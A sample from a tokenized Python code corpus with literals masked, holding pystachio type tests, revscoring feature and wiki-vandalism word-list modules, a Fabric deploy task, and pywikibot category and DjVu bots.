<s> import pytest <EOL> from pystachio . basic import Boolean , Enum , Float , Integer , SimpleObject , String <EOL> def unicodey ( s ) : <EOL> from sys import version_info <EOL> if version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> return unicode ( s ) <EOL> else : <EOL> return s <EOL> def test_bad_inputs ( ) : <EOL> for typ in Float , Integer , String , Boolean : <EOL> with pytest . raises ( TypeError ) : <EOL> typ ( ) <EOL> with pytest . raises ( TypeError ) : <EOL> typ ( "<STR_LIT:1>" , "<STR_LIT:2>" ) <EOL> with pytest . raises ( TypeError ) : <EOL> typ ( foo = '<STR_LIT>' ) <EOL> bad_inputs = [ { <NUM_LIT:1> : <NUM_LIT:2> } , None , type , Float , Integer , String , Boolean , <EOL> Float ( <NUM_LIT:1> ) , Integer ( <NUM_LIT:1> ) , String ( <NUM_LIT:1> ) , Boolean ( <NUM_LIT:1> ) ] <EOL> for inp in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> '<STR_LIT:%s>' % typ ( inp ) <EOL> def test_string_constructors ( ) : <EOL> good_inputs = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , <EOL> <NUM_LIT:1.0> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> <EOL> ] <EOL> for input in good_inputs : <EOL> str ( String ( input ) ) <EOL> repr ( String ( input ) ) <EOL> def test_float_constructors ( ) : <EOL> bad_inputs = [ '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , unicodey ( '<STR_LIT>' ) ] <EOL> good_inputs = [ unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:0.0> , <NUM_LIT> ] <EOL> for input in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> str ( Float ( input ) ) <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> repr ( Float ( input ) ) <EOL> for input in good_inputs : <EOL> str ( Float ( input ) ) <EOL> repr ( Float ( input ) ) <EOL> assert Float ( unicodey ( '<STR_LIT>' ) ) % { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } == Float ( <NUM_LIT> ) <EOL> assert Float ( <NUM_LIT> ) . check ( ) . ok ( ) <EOL> assert Float ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not Float ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> def test_integer_constructors ( ) : <EOL> bad_inputs = [ '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , unicodey ( '<STR_LIT>' ) , '<STR_LIT>' ] <EOL> good_inputs = [ unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:0.0> , <NUM_LIT> ] <EOL> for input in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> str ( Integer ( input ) ) <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> repr ( Integer ( input ) ) <EOL> for input in good_inputs : <EOL> str ( Integer ( input ) ) <EOL> repr ( Integer ( input ) ) <EOL> assert Integer ( <NUM_LIT> ) . check ( ) . ok ( ) <EOL> assert Integer ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not Integer ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> def test_boolean_constructors ( ) : <EOL> bad_inputs = [ '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ] <EOL> good_inputs = [ unicodey ( '<STR_LIT>' ) , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT:true>' , '<STR_LIT:false>' , '<STR_LIT:0>' , '<STR_LIT:1>' , True , False ] <EOL> for input in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> str ( Boolean ( input ) ) <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> repr ( Boolean ( input ) ) <EOL> for input in good_inputs : <EOL> str ( Boolean ( input ) ) <EOL> repr ( Boolean ( input ) ) <EOL> assert Boolean ( <NUM_LIT:0> ) == Boolean ( False ) <EOL> assert Boolean ( <NUM_LIT:0> ) != Boolean ( True ) <EOL> assert Boolean ( <NUM_LIT:1> ) == Boolean ( True ) <EOL> assert Boolean ( <NUM_LIT:1> ) != Boolean ( False ) <EOL> assert Boolean ( "<STR_LIT:0>" ) == Boolean ( False ) <EOL> assert Boolean ( "<STR_LIT:1>" ) == Boolean ( True ) <EOL> assert not Boolean ( "<STR_LIT:2>" ) . check ( ) . ok ( ) <EOL> assert Boolean ( <NUM_LIT> ) . check ( ) . ok ( ) <EOL> assert Boolean ( '<STR_LIT:true>' ) . check ( ) . ok ( ) <EOL> assert Boolean ( '<STR_LIT:false>' ) . check ( ) . ok ( ) <EOL> assert Boolean ( True ) . check ( ) . ok ( ) <EOL> assert Boolean ( False ) . check ( ) . ok ( ) <EOL> assert not Boolean ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert Boolean ( '<STR_LIT>' ) . bind ( foo = True ) . check ( ) . ok ( ) <EOL> def test_cmp ( ) : <EOL> assert not Float ( <NUM_LIT:1> ) == Integer ( <NUM_LIT:1> ) <EOL> assert Float ( <NUM_LIT:1> ) != Integer ( <NUM_LIT:1> ) <EOL> assert not String ( <NUM_LIT:1> ) == Integer ( <NUM_LIT:1> ) <EOL> assert Integer ( <NUM_LIT:1> ) < Integer ( <NUM_LIT:2> ) <EOL> assert Integer ( <NUM_LIT:2> ) > Integer ( <NUM_LIT:1> ) <EOL> assert Integer ( <NUM_LIT:1> ) == Integer ( <NUM_LIT:1> ) <EOL> assert String ( "<STR_LIT:a>" ) < String ( "<STR_LIT:b>" ) <EOL> assert String ( "<STR_LIT:a>" ) == String ( "<STR_LIT:a>" ) <EOL> assert String ( "<STR_LIT:b>" ) > String ( "<STR_LIT:a>" ) <EOL> assert Float ( <NUM_LIT:1> ) < Float ( <NUM_LIT:2> ) <EOL> assert Float ( <NUM_LIT:2> ) > Float ( <NUM_LIT:1> ) <EOL> assert Float ( <NUM_LIT:1> ) == Float ( <NUM_LIT:1> ) <EOL> assert Float ( <NUM_LIT> ) > Float ( <NUM_LIT:1> ) <EOL> for typ1 in ( Float , String , Integer ) : <EOL> for typ2 in ( Float , String , Integer ) : <EOL> if typ1 != typ2 : <EOL> assert typ1 ( <NUM_LIT:1> ) < typ2 ( <NUM_LIT:1> ) <EOL> assert typ1 ( <NUM_LIT:1> ) <= typ2 ( <NUM_LIT:1> ) <EOL> assert not typ1 ( <NUM_LIT:1> ) > typ2 ( <NUM_LIT:1> ) <EOL> assert not typ1 ( <NUM_LIT:1> ) >= typ2 ( <NUM_LIT:1> ) <EOL> def test_hash ( ) : <EOL> map = { <EOL> Integer ( <NUM_LIT:1> ) : '<STR_LIT:foo>' , <EOL> String ( "<STR_LIT:bar>" ) : '<STR_LIT>' , <EOL> Float ( '<STR_LIT>' ) : '<STR_LIT>' , <EOL> Boolean ( '<STR_LIT:true>' ) : '<STR_LIT>' <EOL> } <EOL> assert Integer ( <NUM_LIT:1> ) in map <EOL> assert String ( "<STR_LIT:bar>" ) in map <EOL> assert Float ( '<STR_LIT>' ) in map <EOL> assert Float ( '<STR_LIT>' ) not in map <EOL> assert Integer ( <NUM_LIT:2> ) not in map <EOL> assert String ( "<STR_LIT>" ) not in map <EOL> assert Boolean ( '<STR_LIT:false>' ) not in map <EOL> assert Boolean ( '<STR_LIT:true>' ) in map <EOL> def test_N_part_enum_constructors ( ) : <EOL> EmptyEnum = Enum ( ) <EOL> EmptyEnum ( '<STR_LIT>' ) <EOL> with pytest . raises ( ValueError ) : <EOL> repr ( EmptyEnum ( '<STR_LIT>' ) ) <EOL> OneEnum = Enum ( '<STR_LIT>' ) <EOL> OneEnum ( '<STR_LIT>' ) <EOL> with pytest . raises ( ValueError ) : <EOL> OneEnum ( '<STR_LIT>' ) <EOL> TwoEnum = Enum ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for value in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> TwoEnum ( value ) <EOL> for value in ( '<STR_LIT>' , <NUM_LIT:1> , None , '<STR_LIT>' ) : <EOL> with pytest . raises ( ValueError ) : <EOL> TwoEnum ( value ) <EOL> assert TwoEnum ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert TwoEnum ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert TwoEnum ( '<STR_LIT>' ) . bind ( anything = '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not TwoEnum ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not TwoEnum ( '<STR_LIT>' ) . bind ( anything = '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> def test_two_part_enum_constructors ( ) : <EOL> Numbers = Enum ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> Dogs = Enum ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> assert not Dogs ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not Dogs ( '<STR_LIT>' ) . bind ( what = '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert Dogs ( '<STR_LIT>' ) . bind ( what = '<STR_LIT>' ) . check ( ) . ok ( ) </s>
<s> from revscoring . languages import polish <EOL> from . import enwiki , mediawiki , wikipedia , wikitext <EOL> badwords = [ <EOL> polish . badwords . revision . diff . match_delta_sum , <EOL> polish . badwords . revision . diff . match_delta_increase , <EOL> polish . badwords . revision . diff . match_delta_decrease , <EOL> polish . badwords . revision . diff . match_prop_delta_sum , <EOL> polish . badwords . revision . diff . match_prop_delta_increase , <EOL> polish . badwords . revision . diff . match_prop_delta_decrease <EOL> ] <EOL> informals = [ <EOL> polish . informals . revision . diff . match_delta_sum , <EOL> polish . informals . revision . diff . match_delta_increase , <EOL> polish . informals . revision . diff . match_delta_decrease , <EOL> polish . informals . revision . diff . match_prop_delta_sum , <EOL> polish . informals . revision . diff . match_prop_delta_increase , <EOL> polish . informals . revision . diff . match_prop_delta_decrease <EOL> ] <EOL> dict_words = [ <EOL> polish . dictionary . revision . diff . dict_word_delta_sum , <EOL> polish . dictionary . revision . diff . dict_word_delta_increase , <EOL> polish . dictionary . revision . diff . dict_word_delta_decrease , <EOL> polish . dictionary . revision . diff . dict_word_prop_delta_sum , <EOL> polish . dictionary . revision . diff . dict_word_prop_delta_increase , <EOL> polish . dictionary . revision . diff . dict_word_prop_delta_decrease , <EOL> polish . dictionary . revision . diff . non_dict_word_delta_sum , <EOL> polish . dictionary . revision . diff . non_dict_word_delta_increase , <EOL> polish . dictionary . revision . diff . non_dict_word_delta_decrease , <EOL> polish . dictionary . revision . diff . non_dict_word_prop_delta_sum , <EOL> polish . dictionary . revision . diff . non_dict_word_prop_delta_increase , <EOL> polish . dictionary . revision . diff . non_dict_word_prop_delta_decrease <EOL> ] <EOL> damaging = wikipedia . page + wikitext . parent + wikitext . diff + mediawiki . user_rights + mediawiki . protected_user + mediawiki . comment + badwords + informals + dict_words + enwiki . badwords + enwiki . informals <EOL> reverted = damaging <EOL> goodfaith = damaging </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from . . datasource import Datasource <EOL> class filter ( Datasource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , include , items_datasource , inverse = False , name = None ) : <EOL> self . include = include <EOL> self . inverse = inverse <EOL> name = self . _format_name ( name , [ items_datasource ] ) <EOL> super ( ) . __init__ ( name , self . process , depends_on = [ items_datasource ] ) <EOL> def process ( self , items ) : <EOL> if not self . inverse : <EOL> return [ item for item in items if self . include ( item ) ] <EOL> else : <EOL> return [ item for item in items if not self . include ( item ) ] <EOL> class regex_matching ( filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , regex , strs_datasource , name = None ) : <EOL> if not hasattr ( regex , "<STR_LIT>" ) : <EOL> self . regex = re . compile ( regex , re . I ) <EOL> else : <EOL> self . regex = regex <EOL> super ( ) . __init__ ( self . regex . match , strs_datasource , name = name ) <EOL> class positive ( filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , numbers_datasource , name = None ) : <EOL> super ( ) . __init__ ( self . is_positive , numbers_datasource , name = name ) <EOL> def is_positive ( self , v ) : <EOL> return v > <NUM_LIT:0> <EOL> class negative ( filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , numbers_datasource , name = None ) : <EOL> super ( ) . __init__ ( self . is_negative , numbers_datasource , name = name ) <EOL> def is_negative ( self , v ) : <EOL> return v < <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import yamlconf <EOL> from . . datasources import revision_oriented <EOL> from . . dependencies import Context <EOL> logger = logging . getLogger ( __name__ ) <EOL> class Extractor ( Context ) : <EOL> """<STR_LIT>""" <EOL> def extract ( self , rev_ids , dependents , context = None , caches = None , <EOL> cache = None , profile = None ) : <EOL> raise NotImplementedError ( ) <EOL> @ classmethod <EOL> def from_config ( cls , config , name , section_key = "<STR_LIT>" ) : <EOL> section = config [ section_key ] [ name ] <EOL> if '<STR_LIT>' in section : <EOL> return yamlconf . import_module ( section [ '<STR_LIT>' ] ) <EOL> elif '<STR_LIT:class>' in section : <EOL> Class = yamlconf . import_module ( section [ '<STR_LIT:class>' ] ) <EOL> return Class . from_config ( config , name ) <EOL> class OfflineExtractor ( Extractor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( ) . __init__ ( ) <EOL> logger . warning ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def extract ( self , rev_ids , dependents , context = None , caches = None , <EOL> cache = None , profile = None ) : <EOL> caches = caches or { } <EOL> if hasattr ( rev_ids , "<STR_LIT>" ) : <EOL> return self . _extract_many ( rev_ids , dependents , context = context , <EOL> caches = caches , cache = cache , <EOL> profile = profile ) <EOL> else : <EOL> rev_id = rev_ids <EOL> cache = cache or caches <EOL> return self . _extract ( rev_id , dependents , context = context , <EOL> cache = cache , profile = profile ) <EOL> def _extract ( self , rev_id , dependents , context = None , cache = None , <EOL> profile = None ) : <EOL> solve_cache = { revision_oriented . revision . id : rev_id } <EOL> solve_cache . update ( cache or { } ) <EOL> return self . solve ( dependents , context = context , cache = solve_cache , <EOL> profile = profile ) <EOL> def _extract_many ( self , rev_ids , features , context = None , caches = None , <EOL> cache = None , profile = None ) : <EOL> for rev_id in rev_ids : <EOL> yield None , self . _extract ( rev_id , features , context = context , <EOL> cache = caches . get ( rev_id , cache ) , <EOL> profile = profile ) <EOL> @ classmethod <EOL> def from_config ( cls , config , name , section_key = "<STR_LIT>" ) : <EOL> return cls ( ) </s>
<s> from . revision_oriented import Revision <EOL> from . diff import Diff <EOL> __all__ = [ Revision , Diff ] </s>
<s> """<STR_LIT>""" <EOL> from . dictionary import Dictionary <EOL> from . regex_matches import RegexMatches <EOL> from . stemmed import Stemmed <EOL> from . stopwords import Stopwords <EOL> __all__ = [ Dictionary , RegexMatches , Stemmed , Stopwords ] </s>
<s> from . features import Dictionary , RegexMatches , Stemmed , Stopwords <EOL> name = "<STR_LIT>" <EOL> try : <EOL> import enchant <EOL> dictionary = enchant . Dict ( "<STR_LIT>" ) <EOL> except enchant . errors . DictNotFoundError : <EOL> raise ImportError ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> dictionary = Dictionary ( name + "<STR_LIT>" , dictionary . check ) <EOL> """<STR_LIT>""" <EOL> try : <EOL> from nltk . corpus import stopwords as nltk_stopwords <EOL> stopwords = set ( nltk_stopwords . words ( '<STR_LIT>' ) ) <EOL> except LookupError : <EOL> raise ImportError ( "<STR_LIT>" . format ( __name__ ) + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> stopwords = Stopwords ( name + "<STR_LIT>" , stopwords ) <EOL> """<STR_LIT>""" <EOL> try : <EOL> from nltk . stem . snowball import SnowballStemmer <EOL> stemmer = SnowballStemmer ( "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise ImportError ( "<STR_LIT>" . format ( __name__ ) ) <EOL> stemmed = Stemmed ( name + "<STR_LIT>" , stemmer . stem ) <EOL> """<STR_LIT>""" <EOL> badword_regexes = [ <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , "<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" , <EOL> r"<STR_LIT>" <EOL> ] <EOL> badwords = RegexMatches ( name + "<STR_LIT>" , badword_regexes ) <EOL> """<STR_LIT>""" <EOL> informal_regexes = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> informals = RegexMatches ( name + "<STR_LIT>" , informal_regexes ) <EOL> """<STR_LIT>""" </s>
<s> from nose . tools import eq_ <EOL> from . . recall import recall <EOL> def test_boolean ( ) : <EOL> test_statistic = recall ( ) <EOL> score_labels = [ <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) , <EOL> ( { '<STR_LIT>' : True } , { '<STR_LIT>' : True } , True ) , <EOL> ( { '<STR_LIT>' : False } , { '<STR_LIT>' : True } , False ) <EOL> ] <EOL> all_right , half_right , labels = zip ( * score_labels ) <EOL> stats = test_statistic . score ( all_right , labels ) <EOL> eq_ ( stats , <NUM_LIT:1.0> ) <EOL> stats = test_statistic . score ( half_right , labels ) <EOL> eq_ ( stats , <NUM_LIT:1.0> ) <EOL> eq_ ( test_statistic . format ( stats ) , "<STR_LIT>" ) <EOL> eq_ ( test_statistic . format ( stats , format = "<STR_LIT>" ) , <NUM_LIT:1.0> ) <EOL> def test_multiclass ( ) : <EOL> test_statistic = recall ( ) <EOL> score_labels = [ <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:c>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:a>" } , { '<STR_LIT>' : "<STR_LIT:a>" } , "<STR_LIT:a>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:b>" } , { '<STR_LIT>' : "<STR_LIT:b>" } , "<STR_LIT:b>" ) , <EOL> ( { '<STR_LIT>' : "<STR_LIT:c>" } , { '<STR_LIT>' : "<STR_LIT:c>" } , "<STR_LIT:c>" ) <EOL> ] <EOL> all_right , sometimes_right , labels = zip ( * score_labels ) <EOL> stats = test_statistic . score ( all_right , labels ) <EOL> eq_ ( test_statistic . format ( stats , format = "<STR_LIT>" ) , <EOL> { '<STR_LIT:b>' : <NUM_LIT:1.0> , '<STR_LIT:c>' : <NUM_LIT:1.0> , '<STR_LIT:a>' : <NUM_LIT:1.0> } ) <EOL> stats = test_statistic . score ( sometimes_right , labels ) <EOL> eq_ ( test_statistic . format ( stats , format = "<STR_LIT>" ) , <EOL> { '<STR_LIT:b>' : <NUM_LIT> , '<STR_LIT:a>' : <NUM_LIT:1.0> , '<STR_LIT:c>' : <NUM_LIT> } ) <EOL> assert len ( test_statistic . format ( stats ) ) > <NUM_LIT:5> </s>
<s> from fabric . api import task , env , sudo , cd <EOL> tool_name = '<STR_LIT>' <EOL> env . hosts = [ '<STR_LIT>' ] <EOL> env . sudo_user = '<STR_LIT>' . format ( tool_name ) <EOL> env . sudo_prefix = '<STR_LIT>' <EOL> env . use_ssh_config = True <EOL> home_dir = '<STR_LIT>' . format ( tool_name ) <EOL> code_dir = '<STR_LIT>' . format ( home_dir ) <EOL> @ task <EOL> def deploy ( * args ) : <EOL> with cd ( code_dir ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> import wikipedia as pywikibot <EOL> import catlib <EOL> from category import * <EOL> redirect_templates = [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' ] <EOL> move_message = u'<STR_LIT>' <EOL> cooldown = <NUM_LIT:7> <EOL> def get_redirect_cat ( category = None ) : <EOL> """<STR_LIT>""" <EOL> destination = None <EOL> site = pywikibot . getSite ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> for template in category . templatesWithParams ( ) : <EOL> if ( ( template [ <NUM_LIT:0> ] in redirect_templates ) and ( len ( template [ <NUM_LIT:1> ] ) > <NUM_LIT:0> ) ) : <EOL> destination = catlib . Category ( site , template [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> if not destination . exists ( ) : <EOL> return None <EOL> return destination <EOL> def readyToEdit ( old_category ) : <EOL> """<STR_LIT>""" <EOL> dateformat = "<STR_LIT>" <EOL> today = datetime . now ( ) <EOL> deadline = today + timedelta ( days = - cooldown ) <EOL> old_category . get ( ) <EOL> return ( deadline . strftime ( dateformat ) > old_category . editTime ( ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> site = pywikibot . getSite ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> dirtycat = catlib . Category ( site , u'<STR_LIT>' ) <EOL> destination = None <EOL> catbot = None <EOL> for old_category in dirtycat . subcategories ( ) : <EOL> if ( readyToEdit ( old_category ) ) : <EOL> destination = get_redirect_cat ( old_category ) <EOL> if destination : <EOL> pywikibot . output ( destination . title ( ) ) <EOL> for page in old_category . articles ( ) : <EOL> try : <EOL> catlib . change_category ( <EOL> page , old_category , destination , move_message <EOL> % ( old_category . title ( ) , <EOL> old_category . title ( withNamespace = False ) , <EOL> destination . title ( ) , <EOL> destination . title ( withNamespace = False ) ) ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> for cat in old_category . subcategories ( ) : <EOL> try : <EOL> catlib . change_category ( <EOL> cat , old_category , destination , move_message <EOL> % ( old_category . title ( ) , <EOL> old_category . title ( withNamespace = False ) , <EOL> destination . title ( ) , <EOL> destination . title ( withNamespace = False ) ) ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % page . title ( ) ) <EOL> try : <EOL> old_category . put ( old_category . get ( ) ) <EOL> except : <EOL> pywikibot . output ( u'<STR_LIT>' % old_category . title ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import os <EOL> import sys <EOL> import codecs <EOL> import pywikibot <EOL> from pywikibot import i18n <EOL> import config <EOL> docuReplacements = { <EOL> } <EOL> class DjVuTextBot : <EOL> def __init__ ( self , djvu , index , pages , ask = False , overwrite = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . djvu = djvu <EOL> self . index = index <EOL> self . pages = pages <EOL> self . ask = ask <EOL> self . overwrite = overwrite <EOL> def NoOfImages ( self ) : <EOL> cmd = u"<STR_LIT>" % ( self . djvu ) <EOL> count = os . popen ( cmd . encode ( sys . stdout . encoding ) ) . readline ( ) . rstrip ( ) <EOL> count = int ( count ) <EOL> pywikibot . output ( "<STR_LIT>" % count ) <EOL> return count <EOL> def PagesGenerator ( self ) : <EOL> start = <NUM_LIT:1> <EOL> end = self . NoOfImages ( ) <EOL> if self . pages : <EOL> pos = self . pages . find ( '<STR_LIT:->' ) <EOL> if pos != - <NUM_LIT:1> : <EOL> start = int ( self . pages [ : pos ] ) <EOL> if pos < len ( self . pages ) - <NUM_LIT:1> : <EOL> end = int ( self . pages [ pos + <NUM_LIT:1> : ] ) 